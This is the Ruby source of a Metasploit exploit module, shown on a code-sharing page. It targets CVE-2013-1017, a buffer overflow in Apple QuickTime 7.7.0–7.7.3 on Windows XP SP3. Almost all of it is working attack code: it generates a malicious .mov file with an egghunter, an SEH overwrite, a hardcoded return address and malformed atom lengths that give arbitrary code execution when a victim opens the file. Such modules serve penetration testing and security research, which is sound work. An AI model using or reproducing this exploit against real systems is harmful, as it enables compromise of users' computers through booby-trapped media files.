Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",

17
        'Description' => %q{

18
          This module exploits a vulnerability found in Apple QuickTime. The flaw is

19
          triggered when QuickTime fails to properly handle the data length for certain

20
          atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer

21
          overflow by loading a specially crafted .mov file, and allows arbitrary

22
          code execution under the context of the current user. Please note: Since an egghunter

23
          is used to search for the payload, this may require additional time for

24
          the exploit to complete.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor

29
          'Tom Gallagher', # Original Discovery (overlapped)

30
          'Paul Bates',    # Original Discovery (overlapped)

31
          'sinn3r'         # Metasploit

32
        ],

33
        'References' => [

34
          [ 'CVE', '2013-1017' ],

35
          [ 'OSVDB', '93625' ],

36
          [ 'BID', '60097' ],

37
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],

38
          [ 'ZDI', '13-110' ]

39
        ],

40
        'Platform' => 'win',

41
        'Targets' => [

42
          # Ret = P/P/R in Quicktime.qtx

43
          # Tested on:

44
          # Quicktime 7.7.0

45
          # Quicktime 7.7.1

46
          # Quicktime 7.7.2

47
          # Quicktime 7.7.3

48
          [ 'Quicktime 7.7.0 - 7.7.3 on Windows XP SP3', { 'Ret' => 0x66801042 } ]

49
        ],

50
        'Payload' => {

51
          'BadChars' => "\x00"

52
        },

53
        'Privileged' => false,

54
        'DisclosureDate' => '2013-05-22',

55
        'DefaultTarget'	=> 0,

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_options(

65
      [

66
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.mov']),

67
      ]

68
    )

69
  end

70


71
  def sort_bytes(data)

72
    buf = ''

73
    0.step(data.length, 2) do |i|

74
      buf << data[i, 2].reverse

75
    end

76


77
    buf

78
  end

79


80
  def exploit

81
    fsize = 0

82


83
    badchars = payload_badchars

84
    hunter, egg = generate_egghunter(payload.encoded, badchars, { :checksum => true })

85


86
    buf = ''

87
    buf << "\x61" * 5                                  # Make sure our NOPs don't cause AV

88
    buf << sort_bytes(make_nops(4))                    # Pad 9 bytes to ensure alignment

89
    buf << sort_bytes(hunter)                          # egg huntin'

90
    buf << rand_text_alpha(607 - buf.length)           # Offset 607 to nSEH

91
    buf << sort_bytes("\xeb\x06#{rand_text_alpha(2)}") # nSEH

92
    buf << sort_bytes([target.ret].pack("V*"))         # SE Handler

93
    buf << sort_bytes("\xe9\x95\xfd\xff\xff\xff")      # Jmp to egghunter

94
    buf << rand_text_alpha(50)                         # After SEH, only ~33 bytes

95
    buf << egg                                         # Should be found somewhere else

96


97
    # Quicktime File Format Specifications:

98
    # https://developer.apple.com/standards/qtff-2001.pdf

99
    mov = "\x00\x00\x06\xDF" # File size

100
    mov << "moov"                # Movie atom

101
    mov << "\x00\x00\x06\xD7"    # size (1751d)

102
    mov << "rmra"                # Reference Movie atom

103
    mov << "\x00\x00\x06\xCF"    # size (1743d)

104
    mov << "rmda"                # rmda atom

105
    mov << "\x00\x00\x06\xBF"    # size (1727d)

106
    mov << "rdrf"                # Data reference atom

107
    mov << "\x00\x00\x00\x00"    # size set to 0

108
    mov << "alis"                # Data reference type: FS alias record

109
    mov << "\x00\x00\x06\xAA"    # Size (1706d)

110
    mov << rand_text_alpha(8)

111
    mov << "\x00\x00\x06\x61"    # Size (1633d)

112
    mov << rand_text_alpha(38)

113
    mov << "\x12"

114
    mov << rand_text_alpha(81)

115
    mov << "\xFF\xFF"

116
    mov << rand_text_alpha(18)

117
    mov << "\x00\x08"            # Size (8d)

118
    mov << rand_text_alpha(8)

119
    mov << "\x00\x00"

120
    mov << "\x00\x08"            # Size (8d)

121
    mov << rand_text_alpha(8)

122
    mov << "\x00\x00"

123
    mov << "\x00\x26"            # Size (38d)

124
    mov << rand_text_alpha(38)

125
    mov << "\x00\x0F\x00\x0E"

126
    mov << "AA"                  # Size (must be invalid)

127
    mov << rand_text_alpha(12)

128
    mov << "\x00\x12\x00\x21"

129
    mov << rand_text_alpha(36)

130
    mov << "\x00"

131
    mov << "\x0F\x33"

132
    mov << rand_text_alpha(17)

133
    mov << "\x02\xF4"            # Size (756h)

134
    mov << rand_text_alpha(756)

135
    mov << "\xFF\xFF\x00\x00\x00"

136
    fsize += mov.length

137
    mov << buf

138
    fsize += buf.length

139


140
    mov[0, 4] = [fsize].pack("N")

141


142
    print_status("Creating #{datastore['FILENAME']}")

143
    file_create(mov)

144
  end

145
end

146


147